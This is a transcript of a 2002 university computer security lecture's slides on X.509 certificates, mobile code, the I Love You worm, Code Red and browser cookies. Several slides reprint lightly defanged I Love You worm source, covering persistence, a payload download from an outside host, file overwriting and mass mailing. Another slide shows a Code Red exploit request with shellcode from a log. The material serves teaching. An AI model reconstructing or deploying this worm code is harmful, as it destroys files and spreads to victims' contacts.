20771: Computer Security Lecture 4: ATTACK WEEK

1
20-771 Computer SecurityLecture 4 ATTACK WEEK

• Robert Thibadeau
• School of Computer Science
• Carnegie Mellon University
• Institute for eCommerce, Fall 2002

2
Todays lecture

• X.509v3 (usually Public Key) Certificates
• Break (10 min)
• Mobile Code
• Love Bug
• Code Red
• Cookies

3
This Week

• Chapters 4,5 WS
• on Linux

4
Protocol Stack
TELNET
HTTP
SMTP
NNTP
SSL Interface Port N
FTP
Transport - TCP
Internet - IP
Network Interface EtherNet/etc.
Physical Layer
5
What Could Replace SSL?
TELNET
HTTP
SMTP
NNTP
SSL Interface Port N
FTP
Transport - TCP
IPSec
Internet - IP
Network Interface EtherNet/etc.
Physical Layer
6
X.509v3 Certificates

• More generally used than SSL
• Used by SSL
• Used by nearly every major computer security
  system
• From Older Standards Groups
• ISO/ITU
• International Standards Organization/ANSI
• International Telecommunications Union (was CCITT
  fax, TIFF)
• Part of United Nations as of 1988
• ASN.1 (Abstract Syntax Notation 1) see
  www.asn1.com
• This is instead of BNF and is pretty arcane, but
  includes encoding rules (DER)
• SGML (predecessor of HTML) used this, X.10
  Financial Systems.
• ASN.1 Object Identifier
• LDAP, ASN.1 OIDs, Microsoft GUIDs
• Tree starting with world, down through countries,
  companies, etc., www.hyperstamps.com fun
• Your international phone number is a legal Object
  Identifier
• It is a felony in nearly every country of the
  world to counterfeit an ISO issued Object
  Identifiers

7
X.509v3 Where to Get

• You have to pay 61 Swiss Francs!
• www.itu.org -- search on X.509
• X.509v4 is out
• Those typical Swissalways getting rich
• No, this is how nearly all older standards bodies
  have worked they sell copies of their standards
• Buy them. They are like the RFCs and the W3
  Specifications. They will make you one of the few
  real experts.

8
What is X.509?

• A means of authenticating a directory
• Uses public/private key exclusively (and that
  means RSA for all practical purposes Sept 21,
  remember?)
• A means for chaining certificate authorities
• Didnt work, people really just chain
  certificates
• The information about who you are is hashed and
  signed so this can be compared with the plaintext
  about who you are in the certificate
• Serial Number and v3 also an optional Object
  Identifier Its a FELONY to counterfeit this
  even in IRAQ!!!

9
X.509 Basic Form
Certificate Serial Number
(Signed) Public Key for Authentication/Exchange
RSA
DateTime and Expiration
Sept 21, 2000!
Who you are Plaintext
(Signed) Message Digest for Checking on Message
Integrity
SHA
MD5
10
Concepts behind X.509

• user certificate public key certificate
  certificate
• The public keys of a user, together with some
  other information, rendered unforgeable by
  encipherment with the private key of the
  certification authority which issued it.
• certification path
• An ordered sequence of certificates of objects in
  the directory information tree which, together
  with the public key of the initial object in the
  path, can be processed to obtain that of the
  final object in the path.

11
X.509 Nomenclature
12
Certificate Definition

• Certificate SIGNEDSEQUENCE
• version version Default v1,
• serialNumber CertificateSerialNumber,
• signature AlgorithmIdentifier,
• issuer Name,
• validity Validity,
• subject Name,
• subjectPublicKeyInfo SubjectPublicKeyInfo,
• issuerUniqueIdentifier ObjectIdentifier, - v3
• subjectUniqueIdentifier ObjectIdentifier, - v3
• extensions Extensions,

13
Certificate Defined (cont)

• Version Integer (for v1, v2, v3)
• CertificateSerialNumber Integer
• AlgorithmIdentifier SEQUENCE ..stuff
  about crypto
• Validity SEQUENCE
• notBefore Time,
• notAfter Time
• SubjectPublicKeyInfo SEQUENCE
• algorithm AlgorithmIdentifier,
• subjectPublicKey BITSTRING
• Time CHOICE
• utcTime UTCTime,
• generalizedTime GeneralizedTime
• Extensions SEQUENCE OF extensions
• like, Signed Hash, KeyUsage

14
X.509v3 Certificate

• -----BEGIN CERTIFICATE-----
• MIIDNjCCApgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMA
  kGA1UEBhMCWFkx
• FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2
  UgVG93bjEXMBUG
• A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZm
  ljYXRlIEF1dGhv
• cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhv
  cNAQkBFg9jYUBz
• bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMT
  gyMTUxWjCBpzEL
• MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMB
  EGA1UEBxMKU25h
• a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBg
  NVBAsTDldlYnNl
• cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR
  8wHQYJKoZIhvcN
• AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQ
  UAA4GNADCBiQKB
• gQC554RoVH0dJONqljPBWC72MDNGNy9eXnzejXrczsHs3Pc9
  2Vaat6CpIEEGue
• yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9
  ziYon8jWsbK2aE
• L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImWZds8YEFiAwIDAQ
  ABo24wbDAbBgNV
• HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGGEIBDQ
  QtFittb2Rfc3Ns
• IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMB
  EGCWCGSAGGEIB
• AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nT
  kRDQlBdgCcnhy3
• hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafL
  UMdARVV6BpIGMI
• 5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJm
  jSguYCRt91sU4K
• s0dfWsdItkw4uQ

15
X.509v3 Opened!

• Certificate
• Data
• Version 3 (0x2)
• Serial Number 1 (0x1)
• Signature Algorithm md5WithRSAEncryption
• Issuer CXY, STSnake Desert, LSnake
  Town, OSnake Oil, Ltd, OUCertificate Authority,
  CNSnake Oil CA/Emailca_at_snakeoil.dom
• Validity
• Not Before Oct 21 182151 1999 GMT
• Not After Oct 20 182151 2001 GMT
• Subject CXY, STSnake Desert, LSnake
  Town, OSnake Oil, Ltd, OUWebserver Team,
  CNwww.snakeoil.dom/Emailwww_at_snakeoil.dom
• Subject Public Key Info
• Public Key Algorithm rsaEncryption
• RSA Public Key (1024 bit)
• Modulus (1024 bit)

16
509 Opened 2

• KEY 00b9e78468f951f474938daa58cf05
  6f82ef6303346372f5e5e7
  cde8d7ad
  ccec1ecdcf73dd9569ab7a0a920410
  6b9ec86dbdc5a81bd68ec68f
  629182 9558726771ead1
  ddd899055b905c15
  57d65cbe363d5e2b7fdce26289fc8d
  6b1b2b6684f8bea10ad71bc5
  d6c738 665d4885992707
  3fd55b3bd12ffb22
  65be65db3c60416203 Exponent 65537
  (0x10001)
• X509v3 extensions
• X509v3 Subject Alternative Name
• emailwww_at_snakeoil.dom
• Netscape Comment
• mod_ssl generated custom server
  certificate
• Netscape Cert Type
• SSL Server
• Signature Algorithm md5WithRSAEncryption
  7a311b181935d4479dff9d39110d0941
  7600 9c9e1cb7844adf98f365fcea
  f98d63a6bae7 de217a82bcce9d2b
  b916fca05ba2e8b8a5f7
  c829455a7cb50c74045557a069206308e4
  b9 9514adec830b89d35bfff74842
  b789135a84 fc6076c12ed421ecfc
  d6809a01018ecc2668
  d282e60246df75b14e0ab3475f5ac748b6
  4c 38b9
•  

17
Date Time

• Great Security Technique for Authentication
• Challenge-Response, let mother nature be the
  challenge.
• Very hard to defeat since you have to crack the
  code too quickly can be used to put a time
  limit on things. This is used by many
  certificates.
• Kerberos uses this in issuing tickets for a
  time.
• Great Security Technique for Auditability
• Hash the date-time and sign it.
• Requires an authority or both members of
  transaction to maintain copy (you cant deny your
  signature even if you fix your copy!)

18
X.509 certificate types

• For people
• For web sites
• For companies
• For organizations inside companies
• For software
• Etc. etc. etc.
• You could have X.509 certificates that certify a
  toaster made a piece of toast.

http//yuan.ecom.cmu.edu/security02/509.doc
19
Bits in the KeyUsage type are as follows

• a) digitalSignature For verifying digital
  signatures that have purposes other than those
  identified in b), f),
• or g) below.
• b) nonRepudiation For verifying digital
  signatures used in providing a non-repudiation
  service which
• protects against the signing entity falsely
  denying some action (excluding certificate or CRL
  signing, as
• in f) or g) below).
• c) keyEncipherment For enciphering keys or other
  security information, e.g. for key transport.
  (EXCHANGE)
• d) dataEncipherment For enciphering user data,
  but not keys or other security information as in
  c) above.
• e) keyAgreement For use as a public key
  agreement key.
• f) keyCertSign For verifying a CAs signature on
  certificates.
• g) cRLSign For verifying a CAs signature on
  CRLs.
• h) encipherOnly Public key agreement key for use
  only in enciphering data when used with
  keyAgreement
• bit also set (meaning with other key usage bit
  set is undefined).
• i) decipherOnly Public key agreement key for use
  only in deciphering data when used with
  keyAgreement

20
Whats Wrong with Them

• Classic HORRIBLE USER INTERFACE ASSOCIATED WITH
  GOOD CRYPTOGRAPHY
• You have to apply to a root CA for one
• They invade your privacy
• They make you PAY
• They make them last only one Year
• Funwork Go to Thawte (www.verisign.com) and get
  a free personal certificate for your mail browser
  (outlook, eudora, or netscape)

21
X.509v3

• Contains encrypted information that the source
  can communicate to you in privacy and with
  authority.
• Authenticated, private, tamperproof,
  authorization
• Designed to be employed as the basis for PKI
  chaining authority
• Pass something up the chain for approval
  (signing) to provide the absolute authority
• I.e., the Presidents office confirms such and
  such directive.

22
Break!
23
Active ContentAlso called Mobile Code

• Web Browsers can download and execute software
  automatically without warning.
• Software may damage users system or violate
  privacy.
• Administrator This can tunnel through firewall
  protections.
• Case U.S. Government came close, within two
  weeks, to an executive order that shut down all
  mobile code in the government.
• Failed This would dumb down Federal employees
  and make the Government Stupid.

24
Threats from Mobile Code

• Purposefully malicious
• Moldovan Connection
• Sexygirls.com and Erotic2000.com
• Downloaded and ran viewer, program hung up phone
  and made long distance call to Moldovan, 2 per
  minute.
• User taken to site stayed around without knowing
  charge.
• Last few weeks Some subscribers to Microsoft's
  MSN TV service have been struck with a virus that
  causes their set-top box to dial 911. Ryan
  Permeh, senior research engineer at eEye Digital
  Security, said the virus probably was not
  intended to target MSN TV users.
• I Love You Worm probable accidental escape.
• Big programs have bugs
• Other people will exploit those bugs

25
Traditional Threats

• Trojan Horses Very Serious. Often used for
  spying. (e.g., change the login program to create
  a back door).
• Virus Code that replicates itself and inserts
  into an executable program or file.
• Macro viruses Viruses written in the macro
  language of a word processor, or other trusted
  program. Becomes infectious on other documents.
• Rabbits Programs that make many copies of
  themselves. Standalone. Denial of Service.
• Worms Similar but spread across network.

26
Many Many Threats

• I Love You
• Opening email that says I Love You from a
  person you know Trojan Horse
• Reads your address book Privacy Violation
• Deletes image files Havoc
• Across Network Worm
• Demonstrated
• Microsoft Outlook could execute seriously
  destructive and intrusive active content without
  control of user.

27
Silent Information Thieves!

• Access Log - My NeXT Machine in my office (BSD
  4.2) (/private/adm/network)
• May 9 032305 nageela ftpd2184 refused
  connect from 209.233.224.173
• May 9 052148 nageela ftpd2203
  gethostbyname(adsl-209-233-224-173.pacbell.net)
  lookup failure
• May 9 052148 nageela ftpd2203 refused
  connect from 209.233.224.173
• May 10 063251 nageela ftpd2509 connect from
  vc3-49d.dsl.indra.com
• May 10 065045 nageela ftpd2512 connect from
  vc3-49d.dsl.indra.com
• May 10 065046 nageela ftpd2513 connect from
  vc3-49d.dsl.indra.com
• May 13 071142 nageela ftpd4267 connect from
  bilbo.ee.ualberta.ca
• May 16 194624 nageela telnetd5775 connect
  from 209.208.174.4
• May 16 194624 nageela ftpd5776 connect from
  209.208.174.4
• May 16 194624 nageela ftpd5774 connect from
  209.208.174.4
• May 16 194624 nageela telnetd5777 connect
  from 209.208.174.4
• May 21 030653 nageela telnetd8119 connect
  from hermes.globalwebdesign.com
• May 21 030654 nageela telnetd8120 connect
  from hermes.globalwebdesign.com
• May 21 030654 nageela ftpd8121 connect from
  hermes.globalwebdesign.com
• May 23 070629 nageela telnetd9035 connect
  from spaceace.vi.ri.cmu.edu
• May 24 015535 nageela ftpd9277 connect from
  208.135.135.76
• May 28 050238 nageela ftpd11282 connect from
  cx884963-a.chnd1.az.home.com
• May 29 021638 nageela ftpd11749 connect from
  194.204.246.130

28
(No Transcript)
29
Economic CostsComputer Economics 8-01

• Love Bug 8.7 Billion
• Melissa 1.2 Billion
• Code Red 2.6 Billion
• 250,000 systems in just nine hours on July 19
• 150,000 in 24 on Aug 1 After Warnings
• Repair costs and loss of productivity and unknown
  cost of asset loss

30
I Love You Code(virus has been killed) had name
vxryfunny.vbs

• rxm barok -lovxlxttxr(vbx) lti hatx go to schoolgt
• rxm by spydxr / ispydxr_at_mail.com /
  _at_GRAMMxRSoft Group / Manila,Philippinxs
• dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
• Sxt fso CrxatxObj("Scripting.FilxSystxmObj")
• sxt filx fso.OpxnTxxt(WScript.ScriptFullnamx,1)
• vbscopyfilx.RxadAll

31
I Love You Code 2

• main()
• sxt wscrCrxatxObj("WScript.Shxll")
• rrwscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Micros
  oft\Windows Scripting Host\Sxttings\Timxout")
• wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsof
  t\Windows Scripting Host\Sxttings\Timxout",0,"RxG_
  DWORD"
• Sxt dirwin fso.GxtSpxcialFoldxr(0)
• Sxt dirsystxm fso.GxtSpxcialFoldxr(1)
• Sxt dirtxmp fso.GxtSpxcialFoldxr(2)
• Sxt c fso.GxtFilx(WScript.ScriptFullNamx)
• c.Copy(dirsystxm"\MSKxrnxl32.vbs")
• c.Copy(dirwin"\Win32DLL.vbs")
• c.Copy(dirsystxm"\Vxry Funny.vbs")
• rxgruns()
• html()
• sprxadtoxmail()
• listadriv()

32
I Love You Code 3 rxgruns()

• sub rxgruns()
• rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
  indows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm"\
  MSKxrnxl32.vbs"
• rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
  indows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin
  "\Win32DLL.vbs"
• Dnrxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
  txrnxt xxplorxr\Download Dirory")
• rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt
  xxplorxr\Main\Start Pagx","http//www.skyinxt.nxt/
  young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw658
  7345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
• rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
  indows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad"\
  WIN-BUGSFIX.xxx"
• rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
  txrnxt xxplorxr\Main\Start Pagx","aboutblank"
• xnd sub

33
I Love You Code 4Listing the Drives on Your
Machine(there were several of these utility-type
spies)

• sub listadriv
• Dim d,dc,s
• Sxt dc fso.Drivxs
• For xach d in dc
• If d.DrivxTypx 2 or d.DrivxTypx3 Thxn
• foldxrlist(d.path"\")
• xnd if
• Nxxt
• listadriv s
• xnd sub

34
I Love You Code 5re-writing jpg files

• sub inffilxs(foldxrspxc)
• sxt f fso.GxtFoldxr(foldxrspxc)
• sxt fc f.Filxs
• for xach f1 in fc
• xxtfso.GxtxxtxnsionNamx(f1.path)
• if (xxt"vbs") or (xxt"vbx") thxn
• sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
• ap.writx vbscopy
• ap.closx
• xlsxif(xxt"jpg") or (xxt"jpxg") thxn
• sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
• ap.writx vbscopy
• ap.closx (did same for mp3 files and others)

35
if (xqltgtfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 6 .ini
36
if (xqltgtfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 7 .ini file
37
sub sprxadtoxmail()sxt rxgxditCrxatxObj("WScript
.Shxll")sxt outWScript.CrxatxObj("Outlook.Applic
ation")sxt mapiout.GxtNamxSpacx("MAPI")for
ctrlists1 to mapi.AddrxssLists.Countsxt
amapi.AddrxssLists(ctrlists)rxgvrxgxdit.RxgRxad
("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"a)if
(int(a.Addrxssxntrixs.Count)gtint(rxgv)) thxnfor
ctrxntrixs1 to a.Addrxssxntrixs.Countmalxada.Ad
drxssxntrixs(x)rxgad""rxgadrxgxdit.RxgRxad("HK
xY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"malxad)i
f (rxgad"") thxnsxt malxout.CrxatxItxm(0)malx.
Rxcipixnts.Add(malxad)malx.Subj "fwd
Jokx"malx.Body vbcrlf""malx.Attachmxnts.Add(d
irsystxm"\Vxry Funny.vbs")malx.SxndSxt
outNothingSxt mapiNothingxnd sub
I Love You Code 8 spread mail
38
Silent Attacks

• I should be obvious it would not be hard to
  create a silent worm that sends mail on file
  systems, files, and address lists (and also all
  your mail on your local machine).
• We can do this with your web browser too
• Code Red is only ONE example

39
Virus Checkers

• Pattern match in secret ways to find viral
  fingerprints
• Use a technique called finite state automata to
  create very fast search over your files.
• If virus is not known already, it will do damage.
  
• Finding silent viruses may be hard.

40
Authenticode System

• Windows 2000
• Running code requires a X.509v3 Certificate with
  an approved CA
• Personal Publishers (ID with Credit Bureau)
• Commercial Publishers (Articles of Incorporation)
• Sign a pledge reasonable care consistent with
  prevailing industry standards to keep code free
  from viruses, malicious code, and other dta that
  may damage, misappropriate, or otherwise
  interfere with a third partys operations.
• Remedy Revoke your Certificate (HA!)

41
Steps you can Take

• Dont run as administrator/root
• Use Virus Checkers (but watch those companies!!!)
• Backup Often
• Verify the integrity and authenticity of
  software.
• A very good idea is to not accept active code
  without a certificate that guarantees the author
  can be found!
• Same principle as mutually assured destruction
  or keep the pilot on the plane! He wont hurt
  you if you can hurt him.

42
Record of URLs youve visited

• Browser History file, document cache, and cookies
• Unix spools or /var/adm / Windows /winnt,
  /windows, program files/netscape etc.
• Mobile code can read these.
• Organizations firewall or proxy server (most have
  logging capability)
• ISPs firewall, router, or proxy server.
• Each of the remote servers youve visited.

43
Web Server

• Standard Logs
• HTTP header information
• Date, From, URI, Referrer, Response Status to
  Request
• Also from HTTPS! (The Server Knows!)
• Logs are essential to security
• Fancier Logs
• HTTP
• Whats in the forms
• Whats in the responses
• Really fancy
• Dynamically changing information based on where
  youve been.
• Tracking across web servers.

44
Code Red Log

• 12.27.8.161 - - 09/Sep/2001040707 -0400 "GET
  /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXu9090u6858
  ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
  bd3u7801u9090u9090u8190u00c3u0003u8b00u531
  bu53ffu0078u0000u00a HTTP/1.0" 404 278

45
Code Red I and IIhttp//www.eeye.com/html/Researc
h/Advisories/AL20010804.html

• U9090
• u6858
• ucbd3
• u7801
• u9090
• u6858
• ucbd3
• u7801
• u9090
• u6858
• ucbd3
• u7801
• u9090
• u9090
• u8190
• u00c3
• u0003
• u8b00
• u531b

• u9090
• u6858
• ucbd3
• u7801
• u9090
• u6858
• ucbd3
• u7801
• u9090
• u6858
• ucbd3
• u7801
• u9090
• u9090
• u8190
• u00c3
• u0003
• u8b00
• u531b

46
Cookies (netscape cookie file)

• URL-Invoking-It domain? Path in Server
  https? Expiration Name value
• www.airtime.co.uk FALSE /users/wysywig/
  FALSE 968081837 username aaa
• www.kbb.com FALSE /kb/ki.dll FALSE
  9519638334 zipcode 15638
• www.jcpenney.com FALSE /jcp FALSE
  126632340 ShopperManager6Fjcp
  SHOPPERMANAGER6FJCP6EJSN34316NP100L1RURQ8HHF8MX3
  4
• www.buy.com FALSE /bc FALSE 128333061
  ShopperManager6F SHOPPERMANAGER6FVQ8VSKLC
  WHSN000CM9C9JS7EDVL1
• .doubleclick.net TRUE / FALSE
  196034991340 id 39609560
• .lycos.com TRUE / FALSE 161735952
  CyberTargetAnonymous LYC000AFBAE77275BF6D2734BF
  CF563A16
• .cmgi.com TRUE / FALSE 16173595634
  CyberGlobalAnonymous CTG00017D567763405BF1FB34
  F8BFCD8B1D33
• .webcrawler.com TRUE / FALSE
  9342341600 registered no
• .webcrawler.com TRUE / FALSE
  9342341600 UID 210076B35C89A5C
• .microsoft.com TRUE / FALSE
  1065303482 MC1 GUIDDF160779710D118B1808006B
  B734F3F
• .washingtonpost.com TRUE / FALSE
  9342951343 RMID 98c81c8d3606d690
• www.americanbible.org FALSE / FALSE
  16308113498 Int 343 346 38 3 343 38 30 3
  334 68 5 3
• www.americanbible.org FALSE / FALSE
  1630811600 User Profile F633C7686DA1FDBE8588
  0034CDB11

47
Cookies (netscape cookie file)

• URL-Invoking-It domain? Path in Server
  https? Expiration Name value
• www.antiquebooks.net FALSE / FALSE
  938368777 ulantique 7-1-6-win-ns
• classics.mit.edu FALSE / FALSE
  934285095 ICA_last_work Homer.iliad
• .jcpenny.com TRUE / FALSE 60516333438
  SITESERVER ID69bcf8f963456b19fffdf1ff19f
• .amazon.com TRUE / FALSE 6086797993
  ubid-main 06-6073435981034
• nonprofit.guidestar.org FALSE / FALSE
  613723673 CFID 95690
• .google.com TRUE / FALSE
  6134736834347 ID 34816dff31190ff80
• .cmu.edu TRUE / FALSE 6051263400
  SITESERVER IDf8185834df6bac5f80a793a534c18
• .waterhouse.com TRUE / FALSE
  963585098 accountno 35869873
• tracking.carprices.com FALSE / FALSE
  9634234581 PARTNER CARPRICES
• tracking.carprices.com FALSE / FALSE
  9634234581 MEMB_ID -1
• tracking.carprices.com FALSE / FALSE
  9634234581 USER 10.8.1.35-1
• tracking.carprices.com FALSE / FALSE
  9634234578 RETURN VISITOR

48
Cookies Server Writes to Browser

• Set-Cookie NAMEVALUE expiresDATE pathPATH
  domainDOMAIN_NAME secure
• NAMEVALUE
• expiresDATE
• domainDOMAIN_NAME
• The default value of domain is the host name of
  the server which generated the cookie response.
• pathPATH
• The path attribute is used to specify the subset
  of URLs in a domain for which the cookie is
  valid.
• secure
• If a cookie is marked secure, it will only be
  transmitted if the communications channel with
  the host is a secure one. Currently this means
  that secure cookies will only be sent to HTTPS
  (HTTP over SSL) servers. If secure is not
  specified, a cookie is considered safe to be sent
  in the clear over unsecured channels.

49
Browser Volunteers Cookie to Server!

• If Browser visits the URL again, it volunteers
  cookie name and contents to the URL
• Cookie NAME1OPAQUE_STRING1 NAME2OPAQUE_STRING2
  ...
• Server Database can contain
• Cookie Name
• Opaque String
• Who (what IP/Host/User/etc) reported it
• When

50
Cookie Source Codewww.mozilla.org

• host \t isDomain \t path \t xxx \t expires \t
  name \t cookie from http//lxr.mozilla.org/seamonk
  ey/source/extensions/cookie/nsCookie.cpp2078
• JavaScript Interface! Red - read only
• Name Type
  Description
• path string
  path the cookie applies to
• domain string
  domain the cookie applies to
• name string
  name of the cookie
• value string
  value of the cookie
• expires string
  date the cookie expires
• url string
  url setting the cookie TROJAN HORSE
  OPPORTUNITY!
• isSecure boolean
  the cookie is sent over secure connections only
• isDomain boolean
  the cookie has a domain attribute
• prompt boolean
  user has configured prefs to throw cookie
  confirm dialog
• preference int
  the user's cookie acceptance value
• accept() method
  allows the cookie to be set
• reject() method
  causes the cookie not to be set
• ask() method
  prompt a netlib confirmation dialog
• (happens during netlib
  set cookie execution)

51
Cookies - Notes

• Multiple Set-Cookie headers in single server
  response.
• Same path but different names will add additional
  mappings.
• Higher-level path value not override specific
  path mappings.
• Expires header lets client purge the mapping but
  not required.
• Number of cookies that a client can store at any
  one time.
• 300 total cookies
• 4 kilobytes per cookie
• 20 cookies per server domain.
• CGI script deletes a cookie by returning same
  cookie expired time.
• This requirement makes it difficult for anyone
  but the originator of a cookie to delete a
  cookie.
• Set-cookie response header should never be
  cached.
• If proxy server receives response containing
  Set-cookie, it should propagate the Set-cookie
  header to the client, regardless of whether the
  response was 304 (Not Modified) or 200 (OK).
• Similarly, if a client request contains a Cookie
  header, it should be forwarded through a proxy,
  even if the conditional If-modified-since request
  is being made.

52
Two Sides

• Buyer wants things without exposing any
  information he discloses to any use other than
  what they MUST have to give him the things he
  wants. (Cryptophilia)
• Seller wants to know as much about Buyer as
  possible because this gives him control over
  Buyers and therefore revenue. He can also sell
  this information (e.g., to advertisers). He wants
  unrestricted use of this information.
• BUT, Buyers now collect information on Sellers
  and misuse that (The Sky is Falling.)
• An Agreement is bilateral. The Internet can make
  possible agreements public and thereby expose
  both Sellers and Buyers to violations.